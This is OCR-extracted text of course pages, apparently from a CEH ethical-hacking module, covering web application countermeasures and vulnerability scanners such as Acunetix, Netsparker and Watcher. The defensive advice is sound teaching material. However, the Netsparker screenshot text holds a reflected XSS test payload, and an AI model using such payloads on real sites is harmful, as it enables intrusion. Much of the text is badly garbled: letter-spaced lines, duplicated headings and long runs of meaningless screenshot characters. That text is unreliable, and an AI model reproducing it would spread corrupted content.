ISAPI level filtering
H o w t o D e f e n d A g a i n s t W e b S e r v i c e s A t t a c k s
T o d e f e n d a g a i n s t w e b s e r v i c e s a t t a c k s , t h e r e s h o u l d b e a p r o v i s i o n f o r m u l t i p l e l a y e r s
o f p r o t e c t i o n t h a t d y n a m i c a l l y e n f o r c e s l e g i t i m a t e a p p l i c a t i o n u s a g e a n d b l o c k s all k n o w n
a t t a c k p a t h s w i t h o r w i t h o u t r e l y i n g o n s i g n a t u r e d a t a b a s e s . T h is c o m b i n a t i o n h a s p r o v e n
e f f e c t i v e in b l o c k i n g e v e n u n k n o w n a t t a c k s . S t a n d a r d HTTP a u t h e n t i c a t i o n t e c h n i q u e s s u c h a s
d i g e s t a n d SSL c l i e n t - s i d e c e r t i f i c a t e s c a n b e u s e d f o r w e b s e r v i c e s a s w e ll. S i n c e m o s t m o d e l s
i n c o r p o r a t e b u s i n e s s - t o - b u s i n e s s a p p l i c a t i o n s , it b e c o m e s e a s i e r t o r e s t r i c t a c c e s s t o o n l y v alid
u s e r s .
© C o n f i g u r e f i r e w a l l s / I D S s f o r a w e b s e r v i c e s a n o m a l y a n d s i g n a t u r e d e t e c t i o n .
© C o n f i g u r e W S D L A c c e s s C o n t r o l P e r m i s s i o n s t o g r a n t o r d e n y a c c e s s t o a n y t y p e o f
W S D L - b a s e d S O A P m e s s a g e s .
© C o n f i g u r e f i r e w a l l s / I D S s y s t e m s t o f i lt e r i m p r o p e r S O A P a n d XML s y n t a x .
© U s e d o c u m e n t - c e n t r i c a u t h e n t i c a t i o n c r e d e n t i a l s t h a t u s e SAML.
© I m p l e m e n t c e n t r a l i z e d in -lin e r e q u e s t s a n d r e s p o n s e s s c h e m a v a l i d a t i o n .
© U s e m u l t i p l e s e c u r i t y c r e d e n t i a l s s u c h a s X .5 0 9 C e r t , S A M L a s s e r t i o n s , a n d W S - S e c u r i t y .
© Blo ck e x t e r n a l r e f e r e n c e s a n d u s e p r e - f e t c h e d c o n t e n t w h e n d e - r e f e r e n c i n g URLs.
© D e p l o y w e b - s e r v i c e s - c a p a b l e f i r e w a l l s c a p a b l e o f S O A P - a n d ISAPI-level fi lt e rin g .

Q M a i n t a i n a n d u p d a t e a s e c u r e r e p o s i t o r y o f XML s c h e m a s .

-
Web Application Countermeasures CEH
B r o k e n A u t h e n t i c a t i o n
a n d S e s s i o n M a n a g e m e n t
8 Use SSL fo r all a u th e n tica te d parts
o f th e a p p lica tion
S V e rify w h e th e r all th e users'
id entities and credentials are stored
in a hashed fo rm
8 N ever subm it session data as part
o f a GET, POST
I n s e c u r e C r y p t o g r a p h i c
S t o r a g e
C Do n o t create o r use w eak
c ry p to g ra p h ic a lg o rith m s
® G enerate e n c ry p tio n keys o fflin e
and store th e m securely
© Ensure th a t encrypted data stored
on disk is n o t easy to d e c ry p t
U n v a l i d a t e d R e d i r e c t s ^
a n d F o r w a r d s
© A v o id using redirects and fo rw a rd s
e If destin a tio n param eters cann ot
be avoided, ensure th a t the
supplied value is va lid , and
authorize d fo r th e user
C r o s s - S i t e R e q u e s t
F o r g e r y
L o g o ff im m edia tely a fte r using a w eb
a p p lica tio n and cle ar th e histo ry
Do n o t a llo w yo u r brow se r and
w ebsites to save login details
Check th e HTTP R eferrer hea d e r and
w hen processing a POST, ignore URL
param eters
W e b A p p l i c a t i o n C o u n t e r m e a s u r e s
T h e f o l l o w i n g a r e t h e v a r i o u s c o u n t e - m e a s u r e s t h a t c a n b e a d o p t e d f o r w e b
a p p l i c a t i o n s .
U n v a l i d a t e d R e d i r e c t s a n d F o r w a r d s
A v o i d u s i n g r e d i r e c t s a n d f o r w a r d s if d e s t i n a t i o n p a r a m e t e r s c a n n o t b e a v o i d e d ; e n s u r e t h a t
t h e s u p p l i e d v a l u e is valid, a n d a u t h o r i z e d f o r t h e u s e r .
C r o s s - S i t e R e q u e s t F o r g e r y
© Log o f f i m m e d i a t e l y a f t e r u s i n g a w e b a p p l i c a t i o n a n d c l e a r t h e h i s t o r y .
© D o n o t a l l o w y o u r b r o w s e r a n d w e b s i t e s t o s a v e login d e t a i l s .
© C h e c k t h e HTTP R e f e r r e r h e a d e r a n d w h e n p r o c e s s i n g a POST, i g n o r e URL p a r a m e t e r s .
B r o k e n A u t h e n t i c a t i o n a n d S e s s i o n M a n a g e m e n t
© U s e SSL f o r all a u t h e n t i c a t e d p a r t s o f t h e a p p l i c a t i o n .
© V e rif y w h e t h e r all t h e u s e r s ' i d e n t i t i e s a n d c r e d e n t i a l s a r e s t o r e d in a h a s h e d f o r m .
© N e v e r s u b m i t s e s s i o n d a t a a s p a r t o f a GET, POST.

I n s e c u r e C r y p t o g r a p h i c S t o r a g e
© D o n o t c r e a t e o r u s e w e a k c r y p t o g r a p h i c a l g o r i t h m s .
© G e n e r a t e e n c r y p t i o n k e y s o f f l i n e a n d s t o r e t h e m s e c u r e l y .
© E n s u r e t h a t e n c r y p t e d d a t a s t o r e d o n d i s k is n o t e a s y t o d e c r y p t .

-
Web Application Counterrr16a&11res
( C o n t ’d):
T A
V
T A
▼
/ y / I n s u f f i c i e n t T r a n s p o r t L a y e r P r o t e c t i o n
S Non-SSL requests to web pages should be redirected to th e SSL page
S Set th e 'secure' flag on all sensitive cookies
S Configure SSL provider to support only strong algorithm s
2 Ensure the certificate is valid, n o t expired, and matches all dom ains used by the site
S Backend and other connections should also use SSL o r other encryption technologies
5 Define access rights to the protected areas of the website
6 Apply checks/hot fixes that prevent the exploitation o f the vulnerability
such as Unicode to affect the directory traversal
e Web servers should be updated w ith security patches in a tim ely m anner
S Do not store plain text or weakly encrypted password in a cookie
S Im plem ent cookie's tim e o u t
t! Cookie's authentication credentials should be associated w ith an IP address
S Make logout functions available
s v
.Ccipyright © by EC-CounGil. All Rights ReSeiveilReproduction is Strictly Prohibited.
W e b A p p l i c a t i o n C o u n t e r m e a s u r e s ( C o n t ’ d )
T h e f o l l o w i n g a r e t h e v a r i o u s c o u n t e r m e a s u r e s t h a t c a n b e a d o p t e d f o r w e b
I n s u f f i c i e n t T r a n s p o r t L a y e r P r o t e c t i o n
© N o n -S S L r e q u e s t s t o w e b p a g e s s h o u l d b e r e d i r e c t e d t o t h e SSL p a g e .
© S e t t h e ' s e c u r e ‫׳‬ fl a g o n all s e n s i t i v e c o o k i e s .
© C o n f i g u r e SSL p r o v i d e r t o s u p p o r t o n l y s t r o n g a l g o r i t h m s .
© E n s u r e t h e c e r t i f i c a t e is valid, n o t e x p i r e d , a n d m a t c h e s all d o m a i n s u s e d b y t h e site .
© B a c k e n d a n d o t h e r c o n n e c t i o n s s h o u l d a l s o u s e SSL o r o t h e r e n c r y p t i o n t e c h n o l o g i e s .
© D e f i n e a c c e s s r i g h t s t o t h e p r o t e c t e d a r e a s o f t h e w e b s i t e .
© A p p l y c h e c k s / h o t fi x e s t h a t p r e v e n t t h e e x p l o i t a t i o n o f t h e v u l n e r a b i l i t y s u c h a s U n i c o d e
t o a f f e c t t h e d i r e c t o r y t r a v e r s a l .
© W e b s e r v e r s s h o u l d b e u p d a t e d w i t h s e c u r i t y p a t c h e s in a t i m e l y m a n n e r .

© D o n o t s t o r e p la i n t e x t o r w e a k l y e n c r y p t e d p a s s w o r d in a c o o k i e .
© I m p l e m e n t c o o k i e ' s t i m e o u t .
© C o o k i e ' s a u t h e n t i c a t i o n c r e d e n t i a l s s h o u l d b e a s s o c i a t e d w i t h a n IP a d d r e s s .
0 M a k e l o g o u t f u n c t i o n s a v a i l a b l e .

Web Application Countermeasures
( C o n t ’d )
C E H
F il e I n j e c t i o n
A t t a c k
Strongly validate user input
Consider implementing a
chroot jail
PHP: Disable allow_url_fopen
and allow_url_include in
php.ini
PHP: Disable register_globals
and use E_STRICTtofind
uninitialized variables
PHP: Ensure that all file and
streams functions (stream_*)
are carefully vetted
Perform type, pattern, and
dom ain value validation on all
input data
Make LDAP filte r as specific as
possible
Validate and restrict the
am ount o f data returned to
the user
Implement tig ht access control
on the data in the LDAP
directory
Perform dynam ic testing and
source code analysis
S e c u r i t y
M i s c o n f i g u r a t i o n
Configure all security
mechanisms and turn o ff all
unused services
Setup roles, permissions, and
accounts and disable all
default accounts orchange
their default passwords
Scan fo r latest security
vulnerabilities and apply the
latest security patches
W e b A p p l i c a t i o n C o u n t e r m e a s u r e s ( C o n t ’ d )
T h e f o l l o w i n g a r e t h e v a r i o u s c o u n t e r m e a s u r e s t h a t c a n b e a d o p t e d f o r w e b
S e c u r i t y M i s c o n f i g u r a t i o n
© C o n f i g u r e all s e c u r i t y m e c h a n i s m s a n d t u r n o f f all u n u s e d s e r v i c e s .
© S e t u p r o l e s , p e r m i s s i o n s , a n d a c c o u n t s a n d d i s a b l e all d e f a u l t a c c o u n t s o r c h a n g e t h e i r
d e f a u l t p a s s w o r d s .
© S c a n f o r l a t e s t s e c u r i t y v u l n e r a b i l i t i e s a n d a p p l y t h e l a t e s t s e c u r i t y p a t c h e s .
LDAP I n j e c t i o n A t t a c k s
© P e r f o r m t y p e , p a t t e r n , a n d d o m a i n v a l u e v a l i d a t i o n o n all i n p u t d a t a .
© M a k e LDAP f i l t e r s a s s p e c i f i c a s p o s s i b l e .
© V a l i d a t e a n d r e s t r i c t t h e a m o u n t o f d a t a r e t u r n e d t o t h e u s e r .
© I m p l e m e n t t i g h t a c c e s s c o n t r o l o n t h e d a t a in t h e LDAP d i r e c t o r y .
© P e r f o r m d y n a m i c t e s t i n g a n d s o u r c e c o d e a n a l y s i s .

File I n j e c t i o n A t t a c k
© S t r o n g l y v a l i d a t e u s e r i n p u t .
© C o n s i d e r i m p l e m e n t i n g a c h r o o t jail.
© PHP: D i s a b l e a l l o w _ u r l _ f o p e n a n d a l l o w _ u r l _ i n c l u d e in p h p . i n i .
© PHP: D i s a b l e r e g i s t e r _ g l o b a l s a n d u s e E_STRICT t o fi n d u n i n i t i a l i z e d v a r i a b l e s .
© PHP: E n s u r e t h a t all file a n d s t r e a m s f u n c t i o n s ( s t r e a m _ * ) a r e c a r e f u l l y v e t t e d .
Ethical Hacking and C ounterm easures Copyright © by EC-COUIICil

H o w t o D e f e n d A g a i n s t W e b
A p p l i c a t i o n A t t a c k s
C E H
M a k e LDAP f ilte r
as s p e c ific as p o s s ib le
Custom Error PageLDAP ServerO perating System
. ~ H o w t o D e f e n d A g a i n s t W e b A p p l i c a t i o n A t t a c k s
T o d e f e n d a g a i n s t w e b a p p l i c a t i o n a t t a c k s , y o u c a n f o l l o w t h e c o u n t e r m e a s u r e s
s t a t e d p r e v i o u s l y . T o p r o t e c t t h e w e b s e r v e r , y o u c a n u s e W A F f i r e w a l l / I D S a n d f i lt e r p a c k e t s .
Y ou n e e d t o c o n s t a n t l y u p d a t e t h e s o f t w a r e u s i n g p a t c h e s t o k e e p t h e s e r v e r u p - t o - d a t e a n d t o
p r o t e c t it f r o m a t t a c k e r s . S a n i t i z e a n d f i lt e r u s e r i n p u t , a n a l y z e t h e s o u r c e c o d e f o r SQL
i n j e c t i o n , a n d m i n i m i z e u s e o f t h i r d - p a r t y a p p l i c a t i o n s t o p r o t e c t t h e w e b a p p l i c a t i o n s . Y ou c a n
a l s o u s e s t o r e d p r o c e d u r e s a n d p a r a m e t e r q u e r i e s t o r e t r i e v e d a t a a n d d i s a b l e v e r b o s e e r r o r
m e s s a g e s , w h i c h c a n g u i d e t h e a t t a c k e r w i t h s o m e u s e f u l i n f o r m a t i o n a n d u s e c u s t o m e r r o r
p a g e s t o p r o t e c t t h e w e b a p p l i c a t i o n s . T o a v o i d SQL i n j e c t i o n i n t o t h e d a t a b a s e , c o n n e c t u s i n g a
n o n - p r i v i l e g e d a c c o u n t a n d g r a n t l e a s t p r i v i l e g e s t o t h e d a t a b a s e , t a b l e s , a n d c o l u m n s . D i s a b l e
c o m m a n d s like x p _ c m d s h e l l , w h i c h c a n a f f e c t t h e O S o f t h e s y s t e m .

Shut down the
unnecessary
services and ports
Keep
patches
current
S a nitize and f ilte r
use r in p u t
Configure the firewall
1 11‫י‬ l i i i l to deny external
_
ICMP traffic access
5
yy Perform
input validation
Use WAF Firewall
/IDS and filter packets
Analyze the source
code for SQL injection
— Minimize use of 3rd
**‫׳‬ party apps
InternetAttacker Login Form
Connect to the database
using non-prlvileged account
Use stored procedures
and parameter queries
Web Application
Grant least privileges to the
database, tables, and columns
7 ?
A
Perform dynamic testing
and source code analysis
Disable commands like
xp_cmdshell
Custom Error Page
Disable verbose error
messages and use custom
error pages
Make LDAP filter
as specific as possible
LDAP ServerOperating System
FIGURE 13.61: H ow to D efend A gainst W eb A p p lica tio n A ttacks
All Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le F lo w
W e b A p p C o n c e p t s
0 ‫י‬ I ,
W e b A p p T h r e a t s
&
H a c k i n g M e t h o d o l o g y ^
W e b A p p P e n T e s t i n g
" * S C o u n t e r m e a s u r e s
‫־‬ ‫־‬ ^ M o d u l e F l o w
N o w w e will d i s c u s s w e b a p p l i c a t i o n s e c u r i t y t o o l s . W e b a p p l i c a t i o n s e c u r i t y t o o l s
h e l p y o u t o d e t e c t t h e p o s s i b l e v u l n e r a b i l i t i e s in w e b a p p l i c a t i o n s a u t o m a t i c a l l y . P r i o r t o th i s ,
w e d i s c u s s e d w e b a p p l i c a t i o n c o u n t e r m e a s u r e s t h a t p r e v e n t a t t a c k e r s f r o m e x p l o i t i n g w e b
a p p l i c a t i o n s . In a d d i t i o n t o c o u n t e r m e a s u r e s , y o u c a n a l s o e m p l o y s e c u r i t y t o o l s t o p r o t e c t
y o u r w e b a p p l i c a t i o n s f r o m b e i n g h a c k e d . T o o l s in a d d i t i o n t o t h e c o u n t e r m e a s u r e s o f f e r m o r e
p r o t e c t i o n .
^ W e b A p p P e n T e s t i n g W e b A p p C o n c e p t s
S e c u r i t y T o o l s W e b A p p T h r e a t s
C o u n t e r m e a s u r e s i s ! H a c k i n g M e t h o d o l o g y
!L 3
W e b A p p l i c a t i o n H a c k i n g T o o l s
O k

T h is s e c t i o n is d e d i c a t e d t o t h e s e c u r i t y t o o l s t h a t p r o t e c t w e b a p p l i c a t i o n s a g a i n s t v a r i o u s
a t t a c k s .

W e b A p p l i c a t i o n S e c u r i t y T o o l : r E u
A c u n e t i x W e b V u l n e r a b i l i t y S c a n n e r i
J A c u n e tix W VS checks w e b a p p lic a tio n s fo r SQL in je c tio n s , cro ss-site scrip tin g , etc.
Acunetix Web Vulnerability Scanner (Free Edition)
r
_ 3 a|*> a |3 I ® |i
1 - J *^1 | at Rpperi y- ! • il JRl: !ht^)://tefattpret.vtinwel~* | Piofife: D?fajll
gjj Alerts summary 77 alerts
File Actions Took Conflguacicn Help:
,4‫׳‬;J Nov Scan | [fe J
Expo-cr a•‫-־‬Tcol
Acunetix Threat Level J
One or more hign seventytype
vulnerabilities have been dtsccrrred b»
west wtneoMtMS 3rd conpro‫׳‬T1;«tne
backend database anfl'orde*xeyou'
A acunetix threot levol
Level 3: High
ht1p://tett81pnetvuinweb ri
7123 MQuMti
ToUl alctto found
O High
O Mwllum
O>nw
O informational
2j target information
Stan It flnuhtd
S c o n R e tt* *
- 0 S:an‫־‬T>reac 1(htto:/.’tgs:aspnct.v<Jrr*cb. *>I
B A W >A e‫׳‬t3 (7 7 )
5 O A S S J e ‫־‬ sa d d n q C 1 a d e V jn e fa b lt
* O Bed SQLImrcson PJ
» O c n > * site s c r o t r g (v e n te d ) CIO)
£ Q SQL‫׳‬ipar (21)
‫י‬ ‫י‬ O ‫׳‬* o d c a c c n e r o r ir e s e a c e (3]
» O ASPJETef««r ■ne*M9-{l)
ft O C ro w Pro n e S en jlr tg (S] S
9 O U « . * J e -0J s a « «1* n t n J eai
» O lo o n p f lg e tW M o o 'd o u e w r g o tta c
9 O OPTIONS * c t o d ■ en eb lid (1)
S ^ S n w i C o d » * V ia u lSk u fDai)1
»1 ^ b-cr psoc web sarvar ‫׳‬c90‫׳‬r dad
>■ ^ 006: Prcntp•^ ntpnikn* for l>1i
» O < * 0 6 : :'0e ® tx a y .r e t s e r s ‫מ‬<c fl
i 9 0 0 8 : lo g n p ag e CIO)
fi O type Inputwltt *utocofttd v
<L
Ytrr.o+1
:0.2001:30.02.SQLn«a‫־‬n ‫-״״׳‬Srd)■fr,mine»t.a%px' a
10*0 O lJ iJ /, Mushed scanning.
10.2001:22.32,Savno scan re»J!3 0‫ז‬database...
12.2001:32.39, Dcnr wv n, b d9»«r.
10.2001:32.39,Fua «*‫־‬Duffer*.
0WebViin-rAMy S a n a
Web S ta rr
*B -G Tod
SneOa«ter‫<*}״‬
i :••p T a ^ iiF n ie
Sjbdonah Scanner
:08Msam«r
‫־‬OHTTPEdto
Hnpsmrte*^
‫׳‬••:vfcHTTPPUZJC
fpe*r«« ‫'׳‬n‫*־׳‬SA1.rt*>P
C O w e< te*Jt»
&web S<rvcc»
‫״‬:^WebSe^vrr* Searme
v«?e*td*r‫׳‬WebSe
91x«ton‫*־־‬B-itJ Co
Hl'gv•,*:*‫״‬S••
ot«<‫׳‬1j:«‫™־‬5
li1CTGeneral
SP^ff-ae'U»a»tr5
In fw m ow n‫״‬V erso
t S^partCtntm
g ) LKr-
]£UMTM«1.« (p0C
4■AcuStrsa‫״‬:
http://www.acunetix.com
6 It includes advanced p e n e tra tio n
te stin g to o ls, such as th e HTTP
E d itor and th e HTTP Fuzzer
6 P o rt scans a w e b server and runs
security checks against n e tw o rk
services
e Tests w e b fo rm s and passw ord-
p ro te c te d areas
s It includes an a u to m a tic clie n t
scrip t ana lyzer a llo w in g fo r
security testing o f Ajax and W eb
2.0 app lica tions
Ff• W e b A p p l i c a t i o n S e c u r i t y T o o l : A c u n e t i x W e b
V u l n e r a b i l i t y S c a n n e r
S o u r c e : h t t p : / / w w w . a c u n e t i x . c o m
A c u n e t i x W e b V u l n e r a b i l i t y S c a n n e r a u t o m a t i c a l l y c h e c k s y o u r w e b a p p l i c a t i o n s f o r SQL
i n j e c t i o n , XSS, a n d o t h e r w e b v u l n e r a b i l i t i e s . It i n c l u d e s a d v a n c e d p e n e t r a t i o n t e s t i n g t o o l s ,
s u c h a s t h e HTTP E d i t o r a n d t h e H TT P F u z z e r . It p o r t s c a n s a w e b s e r v e r a n d r u n s s e c u r i t y
c h e c k s a g a i n s t n e t w o r k s e r v i c e s . It e v e n t e s t s w e b f o r m s a n d p a s s w o r d - p r o t e c t e d a r e a s . T h e
a u t o m a t i c c l i e n t s c r i p t a n a l y z e r a l l o w s f o r s e c u r i t y t e s t i n g o f A j a x a n d W e b 2 . 0 a p p l i c a t i o n s .

1-1°Acunetix Web Vulnerability Scanner (Free Edition)In
- a star:
File Actions Tools Configuration Help
I New bean | ' £ J >-‫׳‬ A 2 K? | • ‫י‬‫׳‬< ‫־־־־‬ | & | © | *
|Tools Explore; 0 ‫ן‬ j ^ * ‫י־׳‬ A Report / Star: UR.: http://testaspnet.vulrwel ▼| Profile: |Default
77 alertsAlwtssummary
Acunetix Threat Level 3
One or more highseveritytype
vulnerabilities have been discovered by
the scanner. A malicious user can exploit
these vulnerabilities and compromise the
backend database and/or deface your
website.
A acu netix threat level
Level 3: High
Total alerts found
0 High
O Medium
O low
0 Informational
,jj Target information t!ttp://testaspnet.vulnweb.com:80/ ©
^ ^ta b ftia 7322 requests ©
1 * Progress scan is rmisned 100.00% @
Scan Results
- [a ] Scan Thread 1 ( http://testaspnetvuhweb. ‫׳‬-•
B Web Alerts (77)
(3 0 ASP .NET Padcmg Drade Viinerab*
ffl 40 bind SQL injenxx• (8)
S ^ Cross Site Scrpbng (verified} (10)
B 0 SQL injection (verified] (21)
B C Application error messaoe (3)
B 0 ASP.NET error message (1)
B 0 Cross Fra-ne Scripting (6)
B 0 User credentials a‫־‬e sent in dear te.
B 0 Login page password-guessing attec
B 0 CPTIONS metnod s erabled (1)
B ^ Session Cookie without Secure flag £
B 0 Error page Web Serve‫׳‬ versior dsd
B 0 QHDB: Frontpage extensions for Uni
B 0 QHDB: Possible ASP.fCT sensitve i
B 0 Q O B: Tywcallogh paje (10)
B 0 Password type input with autocompT v
<|_ Ml j |>| 1
Activity V/indow
□
10.20 01:30.02, SQL njection (venfied) Treadnews.aspx* cn pararreter *id'
10.20 01:3237, Finished scanning.
10.20 01132.37, Saving scon results todatabatc ..
10.20 01:32.39, Done saving to database.
10.20 01:32.39, Hush Ne butlers.
|A^icaton''(^]| Error Log
a | Web Vulnerablity Scanner|
®web scanner
B 0 7 Toola
H 5 fr Site Crawler
f i Target Finder‫״״‬
Subdcmain Scanner..........
@Bind SQL Injector
^HTTP Editor
HTTP Sniffer
H I HTTP Fuzzer
h - d Authentication Tester
j y Compare Resdts~‫״‬:
B -fi? Web Servces
Web Servces Scanner
—}*£Web Servces Editor
B Configuration
•■■••;S i Application Settinos
h - 8 Scan Settings
<23Scannng Profiles....
H -f^ r Generol
^Program Lpdates
--C T Version Information
•j f Licensng
support center
Purchase
User Manual (html)
(]£<User Manual (pdf
AcuSensor'•••‫#״‬
Ready
FIGURE 13.62: A cune tix W eb V u ln e ra b ility Scanner Tool Screenshot

W e b A p p l i c a t i o n S e c u r i t y T o o l :
W a t c h e r W e b S e c u r i t y T o o l
C E H
J W a tc h e r is a p lu g in fo r th e F id d le r HTTP p ro x y th a t pa ssive ly a u d its a w e b a p p lic a tio n to fin d s e c u rity
bugs a nd c o m p lia n c e issues a u to m a tic a lly / * , • ‫ץ‬
Q 5HWo jg Iwpettcxs I / *utoReapondir | RequestBuoa | WfaSaK I _ E
ID Log I ‫.—־‬ rmch; 1 ■ v•8'
ac!i«<»nar1pc4cytiks*■‫׳‬LockforPas₪
J Header-ChecktM cathe-caMmlHTTPheadermet totheregorg'vAx
<*‫וי‬₪*0*«3thataCortart-TypeneattrUhciudedhthsHTTPresponseandê>t8whent
Header CheeksthatIE?*XSSproteetenBierKoar»tf beenebabledbytheWebappteabon•‫׳‬
₪OncMiHattheXCONTENT-TYPEOPTONSiJefcnjeaflarvt MlME«fRnflha»b»»ndedjred
J Header Cheeksth®!heXfRAMEOPTlONS■headernbergsetfordefer®• aqaral CkkJaefcro'attacks
B Heady Lccfcter«■«■ahAfrytlcalicrprctooolr
0 rtor‫*״‬ten0<ac*«*re Owckforconwon9‫׳‬mtmMoagwwtLinsdbydatabase* *Hcfi mayrdae 9311!
‫ן‬7‫ז‬ rfy-Bcn Dadeare Oteekfordubomeoiment•thatvnairartfutherattention
7 rtomatonD*3c»je LooHlotevMlNertamatieripajesdttrojtfi HTTPwjjwt ul«twl*w*»a
lookforsemttverfenraterpaiiedIhrouî URL[Mrarreteis
fTiJa<*«utrt-bu‫׳‬wr«^‫׳‬r*1crt«coJ*foruwc<d#>3r0usr‫׳‬ji1)fTK<J«xh
*toow• SDLO*
M/A
OWASPASV12
OWASfASVU
w».'.wBSX
TSrt ‫■*׳־‬>‫־‬kmil srnnrhMTMl convnt, ineludmocomment!
Af.PNTT andWebsaverssuch09IISondApoebe Y<hh
kcommon errormrsinor‫*־‬returnedbyptmtewnssue♦!as
1ftonfioureIbel!v ofcommon debugmer-wiges» lookter
PH>v>arnng
PH»&10r
Vi'arrrg: Carr
mwdiaroiis
( 6w»‫׳‬t ) ExportNeAod• HTNLRwott
it* nge •**‫*י‬ttbamgURU
'So Jft*.'* r-otfcuBtad.tan/m•febw/Ch««fc.Pmv.ltwCanbeUd.Jr/aiuvl£v«<t.1;>v?ul mrTMtVdw*
r r t t h o S c » rc lavaanix ivonti Ahrti mayboafrart‫»׳‬vmtrelUft*a‫׳‬
1J l»*i n w «•« Anrdm#»• ♦ 0 **‫י‬40‫נז‬ dataof an crto.nl'events
fordtntw folowôdataof ac'crrroueeow'event!
tv* j « rxjutmi:
■ytmralie
3‫י‬ User-rp>-‫׳‬f »aafartd mthefelo»ngdataof ar'onerrof'event;
c a s a s a Aatc‫«־‬ V/cDSecurity Tool vlJ.O,CooyriQht©20:0 Casaoa Security. LLC. All risnu reserved.
http://www.casaba.com
C 3 S 3 B 3 watdierWebSecurityTool vt.3.0,Copyright C•2010 C3;3ba ..C- AJIdjitts reserved-
W e b A p p l i c a t i o n S e c u r i t y T o o l : W a t c h e r W e b S e c u r i t y
J L T o o l
S o u r c e : h t t p : / / w w w . c a s a b a . c o m
W a t c h e r is a p l u g i n f o r t h e F i d d l e r HTTP p r o x y t h a t p a s s i v e l y a u d i t s a w e b a p p l i c a t i o n t o f in d
s e c u r i t y b u g s a n d c o m p l i a n c e i s s u e s a u t o m a t i c a l l y . P a s s i v e d e t e c t i o n m e a n s it's s a f e f o r
p r o d u c t i o n u s e . It d e t e c t s w e b - a p p l i c a t i o n s e c u r i t y i s s u e s a n d o p e r a t i o n a l c o n f i g u r a t i o n i s s u e s .

FIGURE 13.63: W a tch e r W eb S ecurity Tool Screenshot

C E H
Web Application Security
Scanner: Netsparker
J N e ts p a rk e r p e rfo rm s a u to m a te d c o m p re h e n s iv e w e b a p p lic a tio n s c a n n in g fo r v u ln e ra b ilitie s such as SQL
in je c tio n , c ro s s -s ite s c rip tin g , re m o te co d e in je c tio n , etc.
J I t d e live rs d e te c tio n , c o n firm a tio n , and e x p lo ita tio n o f v u ln e ra b ilitie s in a s in g le in te g ra te d e n v iro n m e n t
‫ח‬
s fa 11
‫י‬CMnWSw
C ross-site S cripting
c
URL
l a x / / 1c5tJ7.ne2Mrt«r.cQm:8l8!1fflefwra/MSiDyreftected32‫׳‬
P* •‫ד‬‫׳‬ — *H •* 010 » * ‫י‬‫־‬ !$j‫׳‬. Krtpt:
PARAMETER
MAME
ptram
PARAMETER
TVPC
(Jjfryitnnj
ATTACK
PATTtftM
«»a|p1»4k»t(0»0000l&)<
V U L N E R A B IL IT Y D E T A IL S
‫ג‬ CLA SSIFIC A TIO N
XSS(O w rM t SoHAmu) d v «1 mn tv «*«-.**« •
dr«»*on1 kjhA (!••**C'pC V W c 1 <«(>*‫׳‬U o*
a0pbcat»n T**s 1lo«c y t i* o*p4rtun*14«
moith t♦‫•־‬ cvr<nt ■Mixyi *x m«r t* tfunfm] Vm
kvoV(4rtw*0M)*b» *‫♦י‬ wtvi anrt»*yro<t»*m»
k i :.0 t u
K l ‫ו‬.‫נ‬ L iii
OWAV a:
♦ ‫י‬ ‫־‬ ‫י‬ ‫־‬ ‫ז‬ ‫־‬ ‫ר‬ ^ ■
* Croupbuctb)’
Ml 9Vjlnt<jb1KvT>o«
J fVory:SystemlMoneJScarandConfarratcnfirntsd
http://www.mavitunasecurity.com
W e b A p p l i c a t i o n S e c u r i t y S c a n n e r : N e t s p a r k e r
" v ‫׳‬ S o u r c e : h t t p : / / w w w . m a v i t u n a s e c u r i t y . c o m
N e t s p a r k e r ® c a n fi n d a n d r e p o r t o n s e c u r i t y v u l n e r a b i l i t i e s s u c h a s SQL i n j e c t i o n a n d c r o s s - s i t e
s c r i p t i n g (XSS) in all w e b a p p l i c a t i o n s , r e g a r d l e s s o f t h e p l a t f o r m a n d t h e t e c h n o l o g y t h e y a r e
b u il t o n . It a l l o w s y o u t o r e s o l v e s e c u r i t y p r o b l e m s b e f o r e t h e y ' r e a c t u a l l y m i s u s e d a n d
c o m p r o m i s e d b y u n k n o w n a t t a c k e r s .

Q ] tcrst37.nebpdrker.eom - N etipaikei 2.0.0.0 ( Mavituna Security Limited -1 Seat) 1 5 1 ‫־‬ r s 1 ‫־‬ r w 1
I File tyew Reporting Settings Com m unity fcjelp ‫״‬
; Start fcjew Scon j? Stoit £ u»1 j
Browser View HTTP Request / ResponseVulnerability
Controlled Scan Retest
CONFIRMED
C r o s s - s i t e S c r i p t i n g
http://test37.netsparker.com:8081/dllemma/xsstb, reflected/3Z.php
param=<script>alert(0x000016)<!script?
param
Querystring
<scrlpt>alert(0x000016)</scrlpt>
URL
PARAMETER
NAME
PARAMETER
TYPE
ATTACK
PATTERN
«§§ CLASSIFICATIONVULNERABILITY DETAILS
PCI 2 .0 6 .5 .7
PC 11 .2 6.5.1
OWASP A2 -
XSS (C ro s s -s ite S crip tin g ) a llo w s an a tta c k e r to e x e c u te a
dyn a m ic s c rip t {)avascrot, VbScript) in th e c o n te x t o f th e
a p p lic a tio n . This a llo w s se v e ra l d ffe r e n t a tta c k o p p o rtu n itie s ,
m o s tly h ija ckin g th e c u rre n t s e s s io n o f th e u se r o r c h a n g in g th e
lo o k o f th e p a g e b y c h a n g in g th e HTML o n th e fly t o 3te a l th e
Group Issues by
€ Vulnerability T/pe
C Severity
1-1 Cross-site Scripting
‫׳‬dilemma/xsstb/refle<te<j/32.php 1pa‫׳‬am)
f+1•|&) Apache Version Disclosure
Gi-ptt PHP Varcion D icdotur*
G J 0 ‫״‬ Apoche Version Is Out Of Dote
R Encoder IT Logs (4)Issues (*)
□ “S test37.netspahcer.com:8081
0 - & dilemma
xsstb
0 ••© reflected
0 32.php
© Apache Version
1 - Apache Version
| PHP Version Dis
±J —* ?param
}‫®י‬ Cross-site S<
bean Nnished
0002/0002
Scan Information
Current Speed: 2,6rcq.'5cc
Average Speed: 3,7 req/sec
Total Requests: 37
Fxiftd R#qu»et< 0 ‫ז‬
HEAD Requests: 0
Elapsed Tim e: 00:00:10
jf1 Proxy: Svstem[Ncne]Scan and Confirm ation finished.
FIGURE 13.64: N etsp arker Tool Screenshot

E H
W e b A p p l i c a t i o n S e c u r i t y T o o l : N ‫־‬ S t a l k e r
W e b A p p l i c a t i o n S e c u r i t y S c a n n e r
N‫־‬S:alker Web Application Security Scanner2012 - Free EditionIfryfr > 1 » > 1
N—' M-SiakerSenw‫׳‬M-SukerSentner Scan Cffcr«i
5W rt5can
v
r l
mil.(•) MiJ(P) Low 1)
l«MI>
I r. -»:«n AtMMffl 0
